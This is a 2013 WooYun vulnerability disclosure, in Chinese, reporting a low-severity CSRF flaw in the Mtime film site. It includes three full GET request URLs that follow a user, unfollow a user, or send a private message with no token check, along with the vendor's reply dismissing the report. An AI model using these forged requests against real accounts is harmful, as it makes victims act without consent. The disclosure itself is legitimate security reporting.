漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-032778
漏洞标题:再续时光网csrf漏洞
相关厂商:时光网
漏洞作者: n0bele
提交时间:2013-07-30 13:45
修复时间:2013-07-30 14:01
公开时间:2013-07-30 14:01
漏洞类型:CSRF
危害等级:低
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
因为觉得这网站还不错,又看了下.
详细说明:
直接get啥处理都没,
5875540为ID号
添加关注
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=Follow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913162997346&Ajax_CallBackArgument0=5875540
取消关注
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=UnFollow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913185796643&Ajax_CallBackArgument0=5875540
//发送短消息
http://service.mtime.com/Service/Message.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MessageService&Ajax_CallBackMethod=SendUserMessageToNicknameCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Ffollower%2F&t=201372915233312498&Ajax_CallBackArgument0=%E4%B8%8D%E5%BC%BA&Ajax_CallBackArgument1=111111111122222222222222
漏洞证明:
粉丝不在多,在于质量可靠
修复方案:
礼物奉上
版权声明:转载请注明来源 n0bele@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-07-30 14:01
厂商回复:
谢谢 n0bele,忽略的原因主要是:同一个用户会有关注数的上限,发送消息会有频率的控制,对于“水军”我们也会采取屏蔽IP等措施
最新状态:
暂无